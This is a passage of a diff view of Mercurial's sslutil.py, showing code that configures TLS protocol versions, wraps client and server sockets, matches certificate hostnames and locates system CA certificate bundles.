285 if protocol not in configprotocols:
285 if protocol not in configprotocols:
286 raise ValueError('protocol value not supported: %s' % protocol)
286 raise ValueError('protocol value not supported: %s' % protocol)
287
287
288 # Despite its name, PROTOCOL_SSLv23 selects the highest protocol
288 # Despite its name, PROTOCOL_SSLv23 selects the highest protocol
289 # that both ends support, including TLS protocols. On legacy stacks,
289 # that both ends support, including TLS protocols. On legacy stacks,
290 # the highest it likely goes is TLS 1.0. On modern stacks, it can
290 # the highest it likely goes is TLS 1.0. On modern stacks, it can
291 # support TLS 1.2.
291 # support TLS 1.2.
292 #
292 #
293 # The PROTOCOL_TLSv* constants select a specific TLS version
293 # The PROTOCOL_TLSv* constants select a specific TLS version
294 # only (as opposed to multiple versions). So the method for
294 # only (as opposed to multiple versions). So the method for
295 # supporting multiple TLS versions is to use PROTOCOL_SSLv23 and
295 # supporting multiple TLS versions is to use PROTOCOL_SSLv23 and
296 # disable protocols via SSLContext.options and OP_NO_* constants.
296 # disable protocols via SSLContext.options and OP_NO_* constants.
297 # However, SSLContext.options doesn't work unless we have the
297 # However, SSLContext.options doesn't work unless we have the
298 # full/real SSLContext available to us.
298 # full/real SSLContext available to us.
299 if supportedprotocols == {'tls1.0'}:
299 if supportedprotocols == {'tls1.0'}:
300 if protocol != 'tls1.0':
300 if protocol != 'tls1.0':
301 raise error.Abort(_('current Python does not support protocol '
301 raise error.Abort(_('current Python does not support protocol '
302 'setting %s') % protocol,
302 'setting %s') % protocol,
303 hint=_('upgrade Python or disable setting since '
303 hint=_('upgrade Python or disable setting since '
304 'only TLS 1.0 is supported'))
304 'only TLS 1.0 is supported'))
305
305
306 return ssl.PROTOCOL_TLSv1, 0, 'tls1.0'
306 return ssl.PROTOCOL_TLSv1, 0, 'tls1.0'
307
307
308 # WARNING: returned options don't work unless the modern ssl module
308 # WARNING: returned options don't work unless the modern ssl module
309 # is available. Be careful when adding options here.
309 # is available. Be careful when adding options here.
310
310
311 # SSLv2 and SSLv3 are broken. We ban them outright.
311 # SSLv2 and SSLv3 are broken. We ban them outright.
312 options = ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3
312 options = ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3
313
313
314 if protocol == 'tls1.0':
314 if protocol == 'tls1.0':
315 # Defaults above are to use TLS 1.0+
315 # Defaults above are to use TLS 1.0+
316 pass
316 pass
317 elif protocol == 'tls1.1':
317 elif protocol == 'tls1.1':
318 options |= ssl.OP_NO_TLSv1
318 options |= ssl.OP_NO_TLSv1
319 elif protocol == 'tls1.2':
319 elif protocol == 'tls1.2':
320 options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
320 options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
321 else:
321 else:
322 raise error.Abort(_('this should not happen'))
322 raise error.Abort(_('this should not happen'))
323
323
324 # Prevent CRIME.
324 # Prevent CRIME.
325 # There is no guarantee this attribute is defined on the module.
325 # There is no guarantee this attribute is defined on the module.
326 options |= getattr(ssl, 'OP_NO_COMPRESSION', 0)
326 options |= getattr(ssl, 'OP_NO_COMPRESSION', 0)
327
327
328 return ssl.PROTOCOL_SSLv23, options, protocol
328 return ssl.PROTOCOL_SSLv23, options, protocol
329
329
330 def wrapsocket(sock, keyfile, certfile, ui, serverhostname=None):
330 def wrapsocket(sock, keyfile, certfile, ui, serverhostname=None):
331 """Add SSL/TLS to a socket.
331 """Add SSL/TLS to a socket.
332
332
333 This is a glorified wrapper for ``ssl.wrap_socket()``. It makes sane
333 This is a glorified wrapper for ``ssl.wrap_socket()``. It makes sane
334 choices based on what security options are available.
334 choices based on what security options are available.
335
335
336 In addition to the arguments supported by ``ssl.wrap_socket``, we allow
336 In addition to the arguments supported by ``ssl.wrap_socket``, we allow
337 the following additional arguments:
337 the following additional arguments:
338
338
339 * serverhostname - The expected hostname of the remote server. If the
339 * serverhostname - The expected hostname of the remote server. If the
340 server (and client) support SNI, this tells the server which certificate
340 server (and client) support SNI, this tells the server which certificate
341 to use.
341 to use.
342 """
342 """
343 if not serverhostname:
343 if not serverhostname:
344 raise error.Abort(_('serverhostname argument is required'))
344 raise error.Abort(_('serverhostname argument is required'))
345
345
346 for f in (keyfile, certfile):
346 for f in (keyfile, certfile):
347 if f and not os.path.exists(f):
347 if f and not os.path.exists(f):
348 raise error.Abort(_('certificate file (%s) does not exist; '
348 raise error.Abort(_('certificate file (%s) does not exist; '
349 'cannot connect to %s') % (f, serverhostname),
349 'cannot connect to %s') % (f, serverhostname),
350 hint=_('restore missing file or fix references '
350 hint=_('restore missing file or fix references '
351 'in Mercurial config'))
351 'in Mercurial config'))
352
352
353 settings = _hostsettings(ui, serverhostname)
353 settings = _hostsettings(ui, serverhostname)
354
354
355 # We can't use ssl.create_default_context() because it calls
355 # We can't use ssl.create_default_context() because it calls
356 # load_default_certs() unless CA arguments are passed to it. We want to
356 # load_default_certs() unless CA arguments are passed to it. We want to
357 # have explicit control over CA loading because implicitly loading
357 # have explicit control over CA loading because implicitly loading
358 # CAs may undermine the user's intent. For example, a user may define a CA
358 # CAs may undermine the user's intent. For example, a user may define a CA
359 # bundle with a specific CA cert removed. If the system/default CA bundle
359 # bundle with a specific CA cert removed. If the system/default CA bundle
360 # is loaded and contains that removed CA, you've just undone the user's
360 # is loaded and contains that removed CA, you've just undone the user's
361 # choice.
361 # choice.
362 sslcontext = SSLContext(settings['protocol'])
362 sslcontext = SSLContext(settings['protocol'])
363
363
364 # This is a no-op unless using modern ssl.
364 # This is a no-op unless using modern ssl.
365 sslcontext.options |= settings['ctxoptions']
365 sslcontext.options |= settings['ctxoptions']
366
366
367 # This still works on our fake SSLContext.
367 # This still works on our fake SSLContext.
368 sslcontext.verify_mode = settings['verifymode']
368 sslcontext.verify_mode = settings['verifymode']
369
369
370 if settings['ciphers']:
370 if settings['ciphers']:
371 try:
371 try:
372 sslcontext.set_ciphers(settings['ciphers'])
372 sslcontext.set_ciphers(settings['ciphers'])
373 except ssl.SSLError as e:
373 except ssl.SSLError as e:
374 raise error.Abort(_('could not set ciphers: %s') % e.args[0],
374 raise error.Abort(_('could not set ciphers: %s') % e.args[0],
375 hint=_('change cipher string (%s) in config') %
375 hint=_('change cipher string (%s) in config') %
376 settings['ciphers'])
376 settings['ciphers'])
377
377
378 if certfile is not None:
378 if certfile is not None:
379 def password():
379 def password():
380 f = keyfile or certfile
380 f = keyfile or certfile
381 return ui.getpass(_('passphrase for %s: ') % f, '')
381 return ui.getpass(_('passphrase for %s: ') % f, '')
382 sslcontext.load_cert_chain(certfile, keyfile, password)
382 sslcontext.load_cert_chain(certfile, keyfile, password)
383
383
384 if settings['cafile'] is not None:
384 if settings['cafile'] is not None:
385 try:
385 try:
386 sslcontext.load_verify_locations(cafile=settings['cafile'])
386 sslcontext.load_verify_locations(cafile=settings['cafile'])
387 except ssl.SSLError as e:
387 except ssl.SSLError as e:
388 if len(e.args) == 1: # pypy has different SSLError args
388 if len(e.args) == 1: # pypy has different SSLError args
389 msg = e.args[0]
389 msg = e.args[0]
390 else:
390 else:
391 msg = e.args[1]
391 msg = e.args[1]
392 raise error.Abort(_('error loading CA file %s: %s') % (
392 raise error.Abort(_('error loading CA file %s: %s') % (
393 settings['cafile'], msg),
393 settings['cafile'], msg),
394 hint=_('file is empty or malformed?'))
394 hint=_('file is empty or malformed?'))
395 caloaded = True
395 caloaded = True
396 elif settings['allowloaddefaultcerts']:
396 elif settings['allowloaddefaultcerts']:
397 # This is a no-op on old Python.
397 # This is a no-op on old Python.
398 sslcontext.load_default_certs()
398 sslcontext.load_default_certs()
399 caloaded = True
399 caloaded = True
400 else:
400 else:
401 caloaded = False
401 caloaded = False
402
402
403 try:
403 try:
404 sslsocket = sslcontext.wrap_socket(sock, server_hostname=serverhostname)
404 sslsocket = sslcontext.wrap_socket(sock, server_hostname=serverhostname)
405 except ssl.SSLError as e:
405 except ssl.SSLError as e:
406 # If we're doing certificate verification and no CA certs are loaded,
406 # If we're doing certificate verification and no CA certs are loaded,
407 # that is almost certainly the reason why verification failed. Provide
407 # that is almost certainly the reason why verification failed. Provide
408 # a hint to the user.
408 # a hint to the user.
409 # Only modern ssl module exposes SSLContext.get_ca_certs() so we can
409 # Only modern ssl module exposes SSLContext.get_ca_certs() so we can
410 # only show this warning if modern ssl is available.
410 # only show this warning if modern ssl is available.
411 # The exception handler is here to handle bugs around cert attributes:
411 # The exception handler is here to handle bugs around cert attributes:
412 # https://bugs.python.org/issue20916#msg213479. (See issues5313.)
412 # https://bugs.python.org/issue20916#msg213479. (See issues5313.)
413 # When the main 20916 bug occurs, 'sslcontext.get_ca_certs()' is a
413 # When the main 20916 bug occurs, 'sslcontext.get_ca_certs()' is a
414 # non-empty list, but the following conditional is otherwise True.
414 # non-empty list, but the following conditional is otherwise True.
415 try:
415 try:
416 if (caloaded and settings['verifymode'] == ssl.CERT_REQUIRED and
416 if (caloaded and settings['verifymode'] == ssl.CERT_REQUIRED and
417 modernssl and not sslcontext.get_ca_certs()):
417 modernssl and not sslcontext.get_ca_certs()):
418 ui.warn(_('(an attempt was made to load CA certificates but '
418 ui.warn(_('(an attempt was made to load CA certificates but '
419 'none were loaded; see '
419 'none were loaded; see '
420 'https://mercurial-scm.org/wiki/SecureConnections '
420 'https://mercurial-scm.org/wiki/SecureConnections '
421 'for how to configure Mercurial to avoid this '
421 'for how to configure Mercurial to avoid this '
422 'error)\n'))
422 'error)\n'))
423 except ssl.SSLError:
423 except ssl.SSLError:
424 pass
424 pass
425 # Try to print more helpful error messages for known failures.
425 # Try to print more helpful error messages for known failures.
426 if util.safehasattr(e, 'reason'):
426 if util.safehasattr(e, 'reason'):
427 # This error occurs when the client and server don't share a
427 # This error occurs when the client and server don't share a
428 # common/supported SSL/TLS protocol. We've disabled SSLv2 and SSLv3
428 # common/supported SSL/TLS protocol. We've disabled SSLv2 and SSLv3
429 # outright. Hopefully the reason for this error is that we require
429 # outright. Hopefully the reason for this error is that we require
430 # TLS 1.1+ and the server only supports TLS 1.0. Whatever the
430 # TLS 1.1+ and the server only supports TLS 1.0. Whatever the
431 # reason, try to emit an actionable warning.
431 # reason, try to emit an actionable warning.
432 if e.reason == 'UNSUPPORTED_PROTOCOL':
432 if e.reason == 'UNSUPPORTED_PROTOCOL':
433 # We attempted TLS 1.0+.
433 # We attempted TLS 1.0+.
434 if settings['protocolui'] == 'tls1.0':
434 if settings['protocolui'] == 'tls1.0':
435 # We support more than just TLS 1.0+. If this happens,
435 # We support more than just TLS 1.0+. If this happens,
436 # the likely scenario is either the client or the server
436 # the likely scenario is either the client or the server
437 # is really old. (e.g. server doesn't support TLS 1.0+ or
437 # is really old. (e.g. server doesn't support TLS 1.0+ or
438 # client doesn't support modern TLS versions introduced
438 # client doesn't support modern TLS versions introduced
439 # several years from when this comment was written).
439 # several years from when this comment was written).
440 if supportedprotocols != {'tls1.0'}:
440 if supportedprotocols != {'tls1.0'}:
441 ui.warn(_(
441 ui.warn(_(
442 '(could not communicate with %s using security '
442 '(could not communicate with %s using security '
443 'protocols %s; if you are using a modern Mercurial '
443 'protocols %s; if you are using a modern Mercurial '
444 'version, consider contacting the operator of this '
444 'version, consider contacting the operator of this '
445 'server; see '
445 'server; see '
446 'https://mercurial-scm.org/wiki/SecureConnections '
446 'https://mercurial-scm.org/wiki/SecureConnections '
447 'for more info)\n') % (
447 'for more info)\n') % (
448 serverhostname,
448 serverhostname,
449 ', '.join(sorted(supportedprotocols))))
449 ', '.join(sorted(supportedprotocols))))
450 else:
450 else:
451 ui.warn(_(
451 ui.warn(_(
452 '(could not communicate with %s using TLS 1.0; the '
452 '(could not communicate with %s using TLS 1.0; the '
453 'likely cause of this is the server no longer '
453 'likely cause of this is the server no longer '
454 'supports TLS 1.0 because it has known security '
454 'supports TLS 1.0 because it has known security '
455 'vulnerabilities; see '
455 'vulnerabilities; see '
456 'https://mercurial-scm.org/wiki/SecureConnections '
456 'https://mercurial-scm.org/wiki/SecureConnections '
457 'for more info)\n') % serverhostname)
457 'for more info)\n') % serverhostname)
458 else:
458 else:
459 # We attempted TLS 1.1+. We can only get here if the client
459 # We attempted TLS 1.1+. We can only get here if the client
460 # supports the configured protocol. So the likely reason is
460 # supports the configured protocol. So the likely reason is
461 # the client wants better security than the server can
461 # the client wants better security than the server can
462 # offer.
462 # offer.
463 ui.warn(_(
463 ui.warn(_(
464 '(could not negotiate a common security protocol (%s+) '
464 '(could not negotiate a common security protocol (%s+) '
465 'with %s; the likely cause is Mercurial is configured '
465 'with %s; the likely cause is Mercurial is configured '
466 'to be more secure than the server can support)\n') % (
466 'to be more secure than the server can support)\n') % (
467 settings['protocolui'], serverhostname))
467 settings['protocolui'], serverhostname))
468 ui.warn(_('(consider contacting the operator of this '
468 ui.warn(_('(consider contacting the operator of this '
469 'server and ask them to support modern TLS '
469 'server and ask them to support modern TLS '
470 'protocol versions; or, set '
470 'protocol versions; or, set '
471 'hostsecurity.%s:minimumprotocol=tls1.0 to allow '
471 'hostsecurity.%s:minimumprotocol=tls1.0 to allow '
472 'use of legacy, less secure protocols when '
472 'use of legacy, less secure protocols when '
473 'communicating with this server)\n') %
473 'communicating with this server)\n') %
474 serverhostname)
474 serverhostname)
475 ui.warn(_(
475 ui.warn(_(
476 '(see https://mercurial-scm.org/wiki/SecureConnections '
476 '(see https://mercurial-scm.org/wiki/SecureConnections '
477 'for more info)\n'))
477 'for more info)\n'))
478
478
479 elif (e.reason == 'CERTIFICATE_VERIFY_FAILED' and
479 elif (e.reason == 'CERTIFICATE_VERIFY_FAILED' and
480 pycompat.iswindows):
480 pycompat.iswindows):
481
481
482 ui.warn(_('(the full certificate chain may not be available '
482 ui.warn(_('(the full certificate chain may not be available '
483 'locally; see "hg help debugssl")\n'))
483 'locally; see "hg help debugssl")\n'))
484 raise
484 raise
485
485
486 # check if wrap_socket failed silently because socket had been
486 # check if wrap_socket failed silently because socket had been
487 # closed
487 # closed
488 # - see http://bugs.python.org/issue13721
488 # - see http://bugs.python.org/issue13721
489 if not sslsocket.cipher():
489 if not sslsocket.cipher():
490 raise error.Abort(_('ssl connection failed'))
490 raise error.Abort(_('ssl connection failed'))
491
491
492 sslsocket._hgstate = {
492 sslsocket._hgstate = {
493 'caloaded': caloaded,
493 'caloaded': caloaded,
494 'hostname': serverhostname,
494 'hostname': serverhostname,
495 'settings': settings,
495 'settings': settings,
496 'ui': ui,
496 'ui': ui,
497 }
497 }
498
498
499 return sslsocket
499 return sslsocket
500
500
501 def wrapserversocket(sock, ui, certfile=None, keyfile=None, cafile=None,
501 def wrapserversocket(sock, ui, certfile=None, keyfile=None, cafile=None,
502 requireclientcert=False):
502 requireclientcert=False):
503 """Wrap a socket for use by servers.
503 """Wrap a socket for use by servers.
504
504
505 ``certfile`` and ``keyfile`` specify the files containing the certificate's
505 ``certfile`` and ``keyfile`` specify the files containing the certificate's
506 public and private keys, respectively. Both keys can be defined in the same
506 public and private keys, respectively. Both keys can be defined in the same
507 file via ``certfile`` (the private key must come first in the file).
507 file via ``certfile`` (the private key must come first in the file).
508
508
509 ``cafile`` defines the path to certificate authorities.
509 ``cafile`` defines the path to certificate authorities.
510
510
511 ``requireclientcert`` specifies whether to require client certificates.
511 ``requireclientcert`` specifies whether to require client certificates.
512
512
513 Typically ``cafile`` is only defined if ``requireclientcert`` is true.
513 Typically ``cafile`` is only defined if ``requireclientcert`` is true.
514 """
514 """
515 # This function is not used much by core Mercurial, so the error messaging
515 # This function is not used much by core Mercurial, so the error messaging
516 # doesn't have to be as detailed as for wrapsocket().
516 # doesn't have to be as detailed as for wrapsocket().
517 for f in (certfile, keyfile, cafile):
517 for f in (certfile, keyfile, cafile):
518 if f and not os.path.exists(f):
518 if f and not os.path.exists(f):
519 raise error.Abort(_('referenced certificate file (%s) does not '
519 raise error.Abort(_('referenced certificate file (%s) does not '
520 'exist') % f)
520 'exist') % f)
521
521
522 protocol, options, _protocolui = protocolsettings('tls1.0')
522 protocol, options, _protocolui = protocolsettings('tls1.0')
523
523
524 # This config option is intended for use in tests only. It is a giant
524 # This config option is intended for use in tests only. It is a giant
525 # footgun to kill security. Don't define it.
525 # footgun to kill security. Don't define it.
526 exactprotocol = ui.config('devel', 'serverexactprotocol')
526 exactprotocol = ui.config('devel', 'serverexactprotocol')
527 if exactprotocol == 'tls1.0':
527 if exactprotocol == 'tls1.0':
528 protocol = ssl.PROTOCOL_TLSv1
528 protocol = ssl.PROTOCOL_TLSv1
529 elif exactprotocol == 'tls1.1':
529 elif exactprotocol == 'tls1.1':
530 if 'tls1.1' not in supportedprotocols:
530 if 'tls1.1' not in supportedprotocols:
531 raise error.Abort(_('TLS 1.1 not supported by this Python'))
531 raise error.Abort(_('TLS 1.1 not supported by this Python'))
532 protocol = ssl.PROTOCOL_TLSv1_1
532 protocol = ssl.PROTOCOL_TLSv1_1
533 elif exactprotocol == 'tls1.2':
533 elif exactprotocol == 'tls1.2':
534 if 'tls1.2' not in supportedprotocols:
534 if 'tls1.2' not in supportedprotocols:
535 raise error.Abort(_('TLS 1.2 not supported by this Python'))
535 raise error.Abort(_('TLS 1.2 not supported by this Python'))
536 protocol = ssl.PROTOCOL_TLSv1_2
536 protocol = ssl.PROTOCOL_TLSv1_2
537 elif exactprotocol:
537 elif exactprotocol:
538 raise error.Abort(_('invalid value for serverexactprotocol: %s') %
538 raise error.Abort(_('invalid value for serverexactprotocol: %s') %
539 exactprotocol)
539 exactprotocol)
540
540
541 if modernssl:
541 if modernssl:
542 # We /could/ use create_default_context() here since it doesn't load
542 # We /could/ use create_default_context() here since it doesn't load
543 # CAs when configured for client auth. However, it is hard-coded to
543 # CAs when configured for client auth. However, it is hard-coded to
544 # use ssl.PROTOCOL_SSLv23 which may not be appropriate here.
544 # use ssl.PROTOCOL_SSLv23 which may not be appropriate here.
545 sslcontext = SSLContext(protocol)
545 sslcontext = SSLContext(protocol)
546 sslcontext.options |= options
546 sslcontext.options |= options
547
547
548 # Improve forward secrecy.
548 # Improve forward secrecy.
549 sslcontext.options |= getattr(ssl, 'OP_SINGLE_DH_USE', 0)
549 sslcontext.options |= getattr(ssl, 'OP_SINGLE_DH_USE', 0)
550 sslcontext.options |= getattr(ssl, 'OP_SINGLE_ECDH_USE', 0)
550 sslcontext.options |= getattr(ssl, 'OP_SINGLE_ECDH_USE', 0)
551
551
552 # Use the list of more secure ciphers if found in the ssl module.
552 # Use the list of more secure ciphers if found in the ssl module.
553 if util.safehasattr(ssl, '_RESTRICTED_SERVER_CIPHERS'):
553 if util.safehasattr(ssl, '_RESTRICTED_SERVER_CIPHERS'):
554 sslcontext.options |= getattr(ssl, 'OP_CIPHER_SERVER_PREFERENCE', 0)
554 sslcontext.options |= getattr(ssl, 'OP_CIPHER_SERVER_PREFERENCE', 0)
555 sslcontext.set_ciphers(ssl._RESTRICTED_SERVER_CIPHERS)
555 sslcontext.set_ciphers(ssl._RESTRICTED_SERVER_CIPHERS)
556 else:
556 else:
557 sslcontext = SSLContext(ssl.PROTOCOL_TLSv1)
557 sslcontext = SSLContext(ssl.PROTOCOL_TLSv1)
558
558
559 if requireclientcert:
559 if requireclientcert:
560 sslcontext.verify_mode = ssl.CERT_REQUIRED
560 sslcontext.verify_mode = ssl.CERT_REQUIRED
561 else:
561 else:
562 sslcontext.verify_mode = ssl.CERT_NONE
562 sslcontext.verify_mode = ssl.CERT_NONE
563
563
564 if certfile or keyfile:
564 if certfile or keyfile:
565 sslcontext.load_cert_chain(certfile=certfile, keyfile=keyfile)
565 sslcontext.load_cert_chain(certfile=certfile, keyfile=keyfile)
566
566
567 if cafile:
567 if cafile:
568 sslcontext.load_verify_locations(cafile=cafile)
568 sslcontext.load_verify_locations(cafile=cafile)
569
569
570 return sslcontext.wrap_socket(sock, server_side=True)
570 return sslcontext.wrap_socket(sock, server_side=True)
571
571
572 class wildcarderror(Exception):
572 class wildcarderror(Exception):
573 """Represents an error parsing wildcards in DNS name."""
573 """Represents an error parsing wildcards in DNS name."""
574
574
575 def _dnsnamematch(dn, hostname, maxwildcards=1):
575 def _dnsnamematch(dn, hostname, maxwildcards=1):
576 """Match DNS names according RFC 6125 section 6.4.3.
576 """Match DNS names according RFC 6125 section 6.4.3.
577
577
578 This code is effectively copied from CPython's ssl._dnsname_match.
578 This code is effectively copied from CPython's ssl._dnsname_match.
579
579
580 Returns a bool indicating whether the expected hostname matches
580 Returns a bool indicating whether the expected hostname matches
581 the value in ``dn``.
581 the value in ``dn``.
582 """
582 """
583 pats = []
583 pats = []
584 if not dn:
584 if not dn:
585 return False
585 return False
586
586
587 pieces = dn.split(r'.')
587 pieces = dn.split(r'.')
588 leftmost = pieces[0]
588 leftmost = pieces[0]
589 remainder = pieces[1:]
589 remainder = pieces[1:]
590 wildcards = leftmost.count('*')
590 wildcards = leftmost.count('*')
591 if wildcards > maxwildcards:
591 if wildcards > maxwildcards:
592 raise wildcarderror(
592 raise wildcarderror(
593 _('too many wildcards in certificate DNS name: %s') % dn)
593 _('too many wildcards in certificate DNS name: %s') % dn)
594
594
595 # speed up common case w/o wildcards
595 # speed up common case w/o wildcards
596 if not wildcards:
596 if not wildcards:
597 return dn.lower() == hostname.lower()
597 return dn.lower() == hostname.lower()
598
598
599 # RFC 6125, section 6.4.3, subitem 1.
599 # RFC 6125, section 6.4.3, subitem 1.
600 # The client SHOULD NOT attempt to match a presented identifier in which
600 # The client SHOULD NOT attempt to match a presented identifier in which
601 # the wildcard character comprises a label other than the left-most label.
601 # the wildcard character comprises a label other than the left-most label.
602 if leftmost == '*':
602 if leftmost == '*':
603 # When '*' is a fragment by itself, it matches a non-empty dotless
603 # When '*' is a fragment by itself, it matches a non-empty dotless
604 # fragment.
604 # fragment.
605 pats.append('[^.]+')
605 pats.append('[^.]+')
606 elif leftmost.startswith('xn--') or hostname.startswith('xn--'):
606 elif leftmost.startswith('xn--') or hostname.startswith('xn--'):
607 # RFC 6125, section 6.4.3, subitem 3.
607 # RFC 6125, section 6.4.3, subitem 3.
608 # The client SHOULD NOT attempt to match a presented identifier
608 # The client SHOULD NOT attempt to match a presented identifier
609 # where the wildcard character is embedded within an A-label or
609 # where the wildcard character is embedded within an A-label or
610 # U-label of an internationalized domain name.
610 # U-label of an internationalized domain name.
611 pats.append(re.escape(leftmost))
611 pats.append(re.escape(leftmost))
612 else:
612 else:
613 # Otherwise, '*' matches any dotless string, e.g. www*
613 # Otherwise, '*' matches any dotless string, e.g. www*
614 pats.append(re.escape(leftmost).replace(r'\*', '[^.]*'))
614 pats.append(re.escape(leftmost).replace(r'\*', '[^.]*'))
615
615
616 # add the remaining fragments, ignore any wildcards
616 # add the remaining fragments, ignore any wildcards
617 for frag in remainder:
617 for frag in remainder:
618 pats.append(re.escape(frag))
618 pats.append(re.escape(frag))
619
619
620 pat = re.compile(r'\A' + r'\.'.join(pats) + r'\Z', re.IGNORECASE)
620 pat = re.compile(r'\A' + r'\.'.join(pats) + r'\Z', re.IGNORECASE)
621 return pat.match(hostname) is not None
621 return pat.match(hostname) is not None
622
622
623 def _verifycert(cert, hostname):
623 def _verifycert(cert, hostname):
624 '''Verify that cert (in socket.getpeercert() format) matches hostname.
624 '''Verify that cert (in socket.getpeercert() format) matches hostname.
625 CRLs is not handled.
625 CRLs is not handled.
626
626
627 Returns error message if any problems are found and None on success.
627 Returns error message if any problems are found and None on success.
628 '''
628 '''
629 if not cert:
629 if not cert:
630 return _('no certificate received')
630 return _('no certificate received')
631
631
632 dnsnames = []
632 dnsnames = []
633 san = cert.get('subjectAltName', [])
633 san = cert.get('subjectAltName', [])
634 for key, value in san:
634 for key, value in san:
635 if key == 'DNS':
635 if key == 'DNS':
636 try:
636 try:
637 if _dnsnamematch(value, hostname):
637 if _dnsnamematch(value, hostname):
638 return
638 return
639 except wildcarderror as e:
639 except wildcarderror as e:
640 return e.args[0]
640 return e.args[0]
641
641
642 dnsnames.append(value)
642 dnsnames.append(value)
643
643
644 if not dnsnames:
644 if not dnsnames:
645 # The subject is only checked when there is no DNS in subjectAltName.
645 # The subject is only checked when there is no DNS in subjectAltName.
646 for sub in cert.get('subject', []):
646 for sub in cert.get('subject', []):
647 for key, value in sub:
647 for key, value in sub:
648 # According to RFC 2818 the most specific Common Name must
648 # According to RFC 2818 the most specific Common Name must
649 # be used.
649 # be used.
650 if key == 'commonName':
650 if key == 'commonName':
651 # 'subject' entries are unicode.
651 # 'subject' entries are unicode.
652 try:
652 try:
653 value = value.encode('ascii')
653 value = value.encode('ascii')
654 except UnicodeEncodeError:
654 except UnicodeEncodeError:
655 return _('IDN in certificate not supported')
655 return _('IDN in certificate not supported')
656
656
657 try:
657 try:
658 if _dnsnamematch(value, hostname):
658 if _dnsnamematch(value, hostname):
659 return
659 return
660 except wildcarderror as e:
660 except wildcarderror as e:
661 return e.args[0]
661 return e.args[0]
662
662
663 dnsnames.append(value)
663 dnsnames.append(value)
664
664
665 if len(dnsnames) > 1:
665 if len(dnsnames) > 1:
666 return _('certificate is for %s') % ', '.join(dnsnames)
666 return _('certificate is for %s') % ', '.join(dnsnames)
667 elif len(dnsnames) == 1:
667 elif len(dnsnames) == 1:
668 return _('certificate is for %s') % dnsnames[0]
668 return _('certificate is for %s') % dnsnames[0]
669 else:
669 else:
670 return _('no commonName or subjectAltName found in certificate')
670 return _('no commonName or subjectAltName found in certificate')
671
671
672 def _plainapplepython():
672 def _plainapplepython():
673 """return true if this seems to be a pure Apple Python that
673 """return true if this seems to be a pure Apple Python that
674 * is unfrozen and presumably has the whole mercurial module in the file
674 * is unfrozen and presumably has the whole mercurial module in the file
675 system
675 system
676 * presumably is an Apple Python that uses Apple OpenSSL which has patches
676 * presumably is an Apple Python that uses Apple OpenSSL which has patches
677 for using system certificate store CAs in addition to the provided
677 for using system certificate store CAs in addition to the provided
678 cacerts file
678 cacerts file
679 """
679 """
680 if (pycompat.sysplatform != 'darwin' or
680 if (not pycompat.isdarwin or util.mainfrozen() or
681 util.mainfrozen() or not pycompat.sysexecutable):
681 not pycompat.sysexecutable):
682 return False
682 return False
683 exe = os.path.realpath(pycompat.sysexecutable).lower()
683 exe = os.path.realpath(pycompat.sysexecutable).lower()
684 return (exe.startswith('/usr/bin/python') or
684 return (exe.startswith('/usr/bin/python') or
685 exe.startswith('/system/library/frameworks/python.framework/'))
685 exe.startswith('/system/library/frameworks/python.framework/'))
686
686
687 _systemcacertpaths = [
687 _systemcacertpaths = [
688 # RHEL, CentOS, and Fedora
688 # RHEL, CentOS, and Fedora
689 '/etc/pki/tls/certs/ca-bundle.trust.crt',
689 '/etc/pki/tls/certs/ca-bundle.trust.crt',
690 # Debian, Ubuntu, Gentoo
690 # Debian, Ubuntu, Gentoo
691 '/etc/ssl/certs/ca-certificates.crt',
691 '/etc/ssl/certs/ca-certificates.crt',
692 ]
692 ]
693
693
694 def _defaultcacerts(ui):
694 def _defaultcacerts(ui):
695 """return path to default CA certificates or None.
695 """return path to default CA certificates or None.
696
696
697 It is assumed this function is called when the returned certificates
697 It is assumed this function is called when the returned certificates
698 file will actually be used to validate connections. Therefore this
698 file will actually be used to validate connections. Therefore this
699 function may print warnings or debug messages assuming this usage.
699 function may print warnings or debug messages assuming this usage.
700
700
701 We don't print a message when the Python is able to load default
701 We don't print a message when the Python is able to load default
702 CA certs because this scenario is detected at socket connect time.
702 CA certs because this scenario is detected at socket connect time.
703 """
703 """
704 # The "certifi" Python package provides certificates. If it is installed
704 # The "certifi" Python package provides certificates. If it is installed
705 # and usable, assume the user intends it to be used and use it.
705 # and usable, assume the user intends it to be used and use it.
706 try:
706 try:
707 import certifi
707 import certifi
708 certs = certifi.where()
708 certs = certifi.where()
709 if os.path.exists(certs):
709 if os.path.exists(certs):
710 ui.debug('using ca certificates from certifi\n')
710 ui.debug('using ca certificates from certifi\n')
711 return certs
711 return certs
712 except (ImportError, AttributeError):
712 except (ImportError, AttributeError):
713 pass
713 pass
714
714
715 # On Windows, only the modern ssl module is capable of loading the system
715 # On Windows, only the modern ssl module is capable of loading the system
716 # CA certificates. If we're not capable of doing that, emit a warning
716 # CA certificates. If we're not capable of doing that, emit a warning
717 # because we'll get a certificate verification error later and the lack
717 # because we'll get a certificate verification error later and the lack
718 # of loaded CA certificates will be the reason why.
718 # of loaded CA certificates will be the reason why.
719 # Assertion: this code is only called if certificates are being verified.
719 # Assertion: this code is only called if certificates are being verified.
720 if pycompat.iswindows:
720 if pycompat.iswindows:
721 if not _canloaddefaultcerts:
721 if not _canloaddefaultcerts:
722 ui.warn(_('(unable to load Windows CA certificates; see '
722 ui.warn(_('(unable to load Windows CA certificates; see '
723 'https://mercurial-scm.org/wiki/SecureConnections for '
723 'https://mercurial-scm.org/wiki/SecureConnections for '
724 'how to configure Mercurial to avoid this message)\n'))
724 'how to configure Mercurial to avoid this message)\n'))
725
725
726 return None
726 return None
727
727
728 # Apple's OpenSSL has patches that allow a specially constructed certificate
728 # Apple's OpenSSL has patches that allow a specially constructed certificate
729 # to load the system CA store. If we're running on Apple Python, use this
729 # to load the system CA store. If we're running on Apple Python, use this
730 # trick.
730 # trick.
731 if _plainapplepython():
731 if _plainapplepython():
732 dummycert = os.path.join(
732 dummycert = os.path.join(
733 os.path.dirname(pycompat.fsencode(__file__)), 'dummycert.pem')
733 os.path.dirname(pycompat.fsencode(__file__)), 'dummycert.pem')
734 if os.path.exists(dummycert):
734 if os.path.exists(dummycert):
735 return dummycert
735 return dummycert
736
736
737 # The Apple OpenSSL trick isn't available to us. If Python isn't able to
737 # The Apple OpenSSL trick isn't available to us. If Python isn't able to
738 # load system certs, we're out of luck.
738 # load system certs, we're out of luck.
739 if pycompat.sysplatform == 'darwin':
739 if pycompat.isdarwin:
